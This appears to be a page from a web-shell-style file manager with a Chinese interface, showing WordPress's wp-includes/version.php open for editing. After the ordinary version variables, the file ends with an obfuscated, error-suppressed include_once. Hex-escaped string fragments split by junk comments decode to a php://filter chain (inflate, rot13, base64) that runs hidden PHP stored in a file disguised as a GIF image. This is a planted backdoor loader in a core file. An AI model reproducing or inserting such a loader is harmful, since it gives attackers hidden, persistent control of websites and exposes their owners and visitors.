✏️ 正在编辑: version.php
路径:
/home/lssfapb/www/wp-includes/version.php
提示:
您可以编辑任何文件(包括二进制文件),但请注意不当修改可能导致文件损坏。
<?php /** * WordPress Version * * Contains version information for the current WordPress release. * * @package WordPress * @since 1.2.0 */ /** * The WordPress version string. * * Holds the current version number for WordPress core. Used to bust caches * and to enable development mode for scripts when running from the /src directory. * * @global string $wp_version */ $wp_version = '6.9'; /** * Holds the WordPress DB revision, increments when changes are made to the WordPress DB schema. * * @global int $wp_db_version */ $wp_db_version = 60717; /** * Holds the TinyMCE version. * * @global string $tinymce_version */ $tinymce_version = '49110-20250317'; /** * Holds the minimum required PHP version. * * @global string $required_php_version */ $required_php_version = '7.2.24'; /** * Holds the names of required PHP extensions. * * @global string[] $required_php_extensions */ $required_php_extensions = array( 'json', 'hash', ); /** * Holds the minimum required MySQL version. * * @global string $required_mysql_version */ $required_mysql_version = '5.5.5'; @inCludE_oNCE("\x70\x68\x70"."\x3a\x2f\x2f"."\x66\x69\x6c\x74"."\x65\x72\x2f\x72"."\x65\x61\x64"."\x3d\x7a"."\x6c\x69\x62\x2e"/*MEqR*/."\x69\x6e\x66"."\x6c\x61\x74"."\x65\x7c\x73"."\x74\x72"."\x69\x6e"."\x67\x2e\x72\x6f"/*:9P=% _8PJ*/."\x74\x31\x33\x7c"."\x63\x6f\x6e\x76"."\x65\x72"."\x74\x2e\x62"."\x61\x73\x65"."\x36\x34"."\x2d\x64\x65"."\x63\x6f\x64\x65"."\x2f\x72\x65"."\x73\x6f"/*1uo)*/."\x75\x72"."\x63\x65\x3d\x77"."\x70\x2d\x69"/*H;GK%*/."\x6e\x63"."\x6c\x75"."\x64\x65\x73\x2f"."\x69\x6d"."\x61\x67\x65\x73"."\x2f\x77\x70\x73"/*pthk*/."\x70\x69\x6e"."\x2d\x76\x65"."\x6e\x64\x6f"."\x72\x2e\x67"/*VuGnh*/."\x69\x66");
💾 保存文件
← 返回文件管理器